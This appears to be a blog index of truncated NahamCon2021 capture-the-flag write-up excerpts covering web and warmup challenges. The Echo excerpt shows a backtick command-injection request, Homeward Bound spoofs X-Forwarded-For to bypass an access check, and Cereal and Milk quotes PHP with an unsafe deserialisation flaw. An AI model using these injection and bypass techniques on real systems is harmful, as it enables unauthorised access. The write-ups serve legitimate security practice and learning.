NahamCon2021 CTF - AgentTester

category: web - medium · solution

We’re given an archive to download, agenttester.zip. This contained a Dockerfile and a Python web application. The files in the archive had many secrets redacted which were set using environment variables. One specifically interesting one was CHALLENGE_FLAG, which we could assume was the target value to leak. The challenge URL dropped us on a page where we need to login. So, create an account, login and land on the home page of the agent tester....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Bad Blog

category: web - medium · solution

The challenge URL drops us on a page where we need to login. So, create an account, login and land on the home page of a blog. After creating a new post, you can see who visited your blog in the profile section. Poking around will reveal that if you tamper with your user agent string, that is what will show up in the analytics section....

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Cereal and Milk

category: web - medium · solution

The challenge URL drops us on a page where we can submit cereals. We are also given two files to download, index.php & log.php. I quickly spotted an unsafe deserialisation bug in the provided files. The cleaned up and relevant PHP code from both files was:

index.php

<?php
include 'log.php';

class CerealAndMilk {
    public $logs = "request-logs.txt";
    public $request = '';
    public $cereal = 'Captain Crunch';
    public $milk = '';

    public function processed_data($output) {
        echo "Deserilized data:<br> Coming soon....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Imposter

category: web - medium · solution

This was a trickier, but fun one. The challenge URL drops us on a login page with an OTP field. Signing up for an account responded with a JSON structure containing a url key with an otpauth URI.

Request

POST /signup HTTP/1.1
Host: challenge.nahamcon.com:30809
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://challenge....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Echo

category: warmups - easy · solution

The challenge URL had a web based echo service. Many special characters, except for < and `, were filtered. It took me a while but I found the param had command injection. For example:

GET /?echo=`id` HTTP/1.1
Host: challenge.nahamcon.com:30074
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://challenge.nahamcon.com:30074/?echo=food
Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0....

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Homeward Bound

category: web - easy · solution

The challenge URL returns the message Sorry, this page is not accessible externally. Add the X-Forwarded-For: 127.0.0.1 header to reveal the flag.

GET / HTTP/1.1
Host: challenge.nahamcon.com:30903
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E
Upgrade-Insecure-Requests: 1

The response has the flag.

<p class="card-text"> <div class="alert alert-success" role="alert"> <b>Welcome!...

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Esab64

category: warmups - easy · solution

The downloaded file contained a string, which looked like it was base64 encoded. The challenge title was also base64 reversed, esab64.

❯ cat esab64
mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X

To solve, reverse the string, base64 decode and then reverse it again.

import base64

with open("esab64", "r") as f:
    s = f.readline()

s = s[::-1]
d = base64.b64decode(s)
print(d[::-1][:-1])

Running it gives us the flag.

$ python3 solve.py
b'flag{fb5211b498afe87b1bd0db601117e16e}'

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Pollex

category: warmups - easy · solution

The downloaded file you get is an image, which when opened looks like this:

Output of exiftool shows that there is a thumbnail, with a hint to extract it right at the bottom.

❯ exiftool pollex.jpg
ExifTool Version Number         : 12.16
File Name                       : pollex.jpg
Directory                       : .
File Size                       : 37 KiB
File Modification Date/Time     : 2021:03:13 13:40:45+02:00
File Access Date/Time           : 2021:03:15 09:53:11+02:00
File Inode Change Date/Time     : 2021:03:15 09:53:11+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1....

March 15, 2021 · 2 min · Leon Jacobs